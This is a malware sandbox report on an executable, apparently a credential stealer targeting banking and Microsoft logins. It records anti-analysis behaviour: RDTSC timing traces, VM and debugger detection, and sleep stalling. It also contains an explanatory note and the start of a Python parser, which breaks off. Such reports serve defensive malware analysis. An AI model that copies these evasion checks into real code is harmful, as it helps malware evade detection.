                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E39DE2 second address: E39E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA944B213EAh 0x0000000a popad 0x0000000b push edi 0x0000000c jne 00007FA944B213F2h 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007FA944B213E6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3A0F8 second address: E3A0FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3A0FD second address: E3A10D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA944B213E6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3A10D second address: E3A12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944C70C8Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jnl 00007FA944C70C86h 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3A12F second address: E3A135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3A135 second address: E3A139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3A139 second address: E3A13D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3A13D second address: E3A145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3A145 second address: E3A150 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FA944B213E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3A150 second address: E3A156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3B99B second address: E3B9B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA944B213F1h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3B9B2 second address: E3B9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D1203E second address: D12042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D12042 second address: D12046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D12046 second address: D1204C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D1204C second address: D12052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D12052 second address: D12058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D12058 second address: D120A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA944C70C96h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FA944C70C92h 0x00000016 pop edx 0x00000017 jl 00007FA944C70C8Eh 0x0000001d jns 00007FA944C70C86h 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3F952 second address: E3F95F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA944B213E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3FF08 second address: E3FF31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edx, dword ptr [ebp+122D2D86h] 0x00000011 push dword ptr [ebp+122D2B2Ah] 0x00000017 stc 0x00000018 push 19D7C251h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jp 00007FA944C70C86h 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3FF31 second address: E3FF37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3FF37 second address: E3FF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3FF3B second address: E3FF3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E41944 second address: E41949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E41949 second address: E41953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FA944B213E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E413F2 second address: E4142D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C95h 0x00000007 jnl 00007FA944C70C86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jmp 00007FA944C70C94h 0x00000015 jno 00007FA944C70C86h 0x0000001b pop ecx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E4142D second address: E4145A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FA944B213F3h 0x00000008 jmp 00007FA944B213F3h 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E4145A second address: E4147B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944C70C8Ah 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FA944C70C8Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E4147B second address: E4147F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E4147F second address: E41483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E43418 second address: E4341C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D57209 second address: D57213 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA944C70C86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F02D4 second address: 52F02DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F02DA second address: 52F02DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F02DE second address: 52F02E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F02E2 second address: 52F02F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F02F1 second address: 52F030A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F030A second address: 52F031A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA944C70C8Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F031A second address: 52F0383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FA944B213F7h 0x00000010 mov ebp, esp 0x00000012 jmp 00007FA944B213F6h 0x00000017 mov edx, dword ptr [ebp+0Ch] 0x0000001a jmp 00007FA944B213F0h 0x0000001f mov ecx, dword ptr [ebp+08h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FA944B213F7h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F0383 second address: 52F0389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F0389 second address: 52F038D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F03A0 second address: 52F03A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5310549 second address: 531056D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA944B213ECh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 531056D second address: 531057F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA944C70C8Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 531057F second address: 53105B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, 0F0722BFh 0x00000011 pushfd 0x00000012 jmp 00007FA944B213F4h 0x00000017 or ax, 8DA8h 0x0000001c jmp 00007FA944B213EBh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53105B7 second address: 53105D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov cx, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA944C70C8Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | RDTSC instruction interceptor: 81 intercepted rdtsc pairs at addresses between 52F0E59 and 5310B5F (per-pair instruction traces omitted)
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | Special instruction interceptor: First address: D4AAA1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | Special instruction interceptor: First address: BA629A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | Special instruction interceptor: First address: D76815 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | Special instruction interceptor: First address: DD4B63 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | Window / User API: threadDelayed 1271
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | Window / User API: threadDelayed 1322
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | Window / User API: threadDelayed 1199
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | Window / User API: threadDelayed 1250
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | Window / User API: threadDelayed 1221
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | Window / User API: threadDelayed 353
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 5604 | Thread sleep count: 72 > 30
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 5604 | Thread sleep time: -144072s >= -30000s
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 5864 | Thread sleep count: 1271 > 30
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 5864 | Thread sleep time: -2543271s >= -30000s
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 4432 | Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 6840 | Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 3456 | Thread sleep count: 1322 > 30
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 3456 | Thread sleep time: -2645322s >= -30000s
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 2040 | Thread sleep count: 1199 > 30
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 2040 | Thread sleep time: -2399199s >= -30000s
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 3552 | Thread sleep count: 1250 > 30
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 3552 | Thread sleep time: -2501250s >= -30000s
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 6072 | Thread sleep count: 1221 > 30
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 6072 | Thread sleep time: -2443221s >= -30000s
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 2040 | Thread sleep count: 353 > 30
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 2040 | Thread sleep time: -706353s >= -30000s
Source: C:\Users\user\Desktop\P0SJULJxI0.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: P0SJULJxI0.exe, P0SJULJxI0.exe, 00000000.00000002.2521982736.0000000000D2C000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696494690p
Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: P0SJULJxI0.exe, 00000000.00000003.2504979670.0000000001484000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2506445308.0000000001484000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2524940975.0000000001484000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1625381463.0000000001484000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2520589257.0000000001447000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2100391243.0000000001484000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2524863223.0000000001447000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2481187488.0000000001484000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: P0SJULJxI0.exe, 00000000.00000002.2521982736.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeProcess information queried: ProcessInformation

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: SICE
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeProcess queried: DebugPort
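The sleep-stalling figures in the sandbox-evasion section and the window-class, SoftICE-device and debug-port probes in the anti-debugging section are easier to reason about once they are parsed into a per-thread and per-technique summary. The Python below is an added example written for this page, not Joe Sandbox code and not part of the report. It embeds a constructed subset of the lines above as input. Two things in it are assumptions rather than statements of the report: the 's'-suffixed sleep values are treated as accumulated milliseconds (1271 calls of roughly 2001 each can only fit inside a sandbox run in that unit), and the artifact-to-tool table, including the entry that treats "gbdyllo" as an OllyDbg probe only because it is "ollydbg" spelled backwards, is a reference table kept in the script.

```python
import re
from collections import defaultdict

# Constructed sample: behaviour lines copied from the two sections above, with
# the "Jump to behavior" link labels removed, embedded so this runs offline.
SAMPLE = r"""
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 5604Thread sleep count: 72 > 30
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 5604Thread sleep time: -144072s >= -30000s
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 5864Thread sleep count: 1271 > 30
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 5864Thread sleep time: -2543271s >= -30000s
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 4432Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 2040Thread sleep count: 1199 > 30
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 2040Thread sleep time: -2399199s >= -30000s
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 2040Thread sleep count: 353 > 30
Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 2040Thread sleep time: -706353s >= -30000s
Source: C:\Users\user\Desktop\P0SJULJxI0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\P0SJULJxI0.exeThread information set: HideFromDebugger
Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: NTICE
Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: SICE
Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\P0SJULJxI0.exeProcess queried: DebugPort
"""

# The report fuses the source cell and the event cell; split on known event names.
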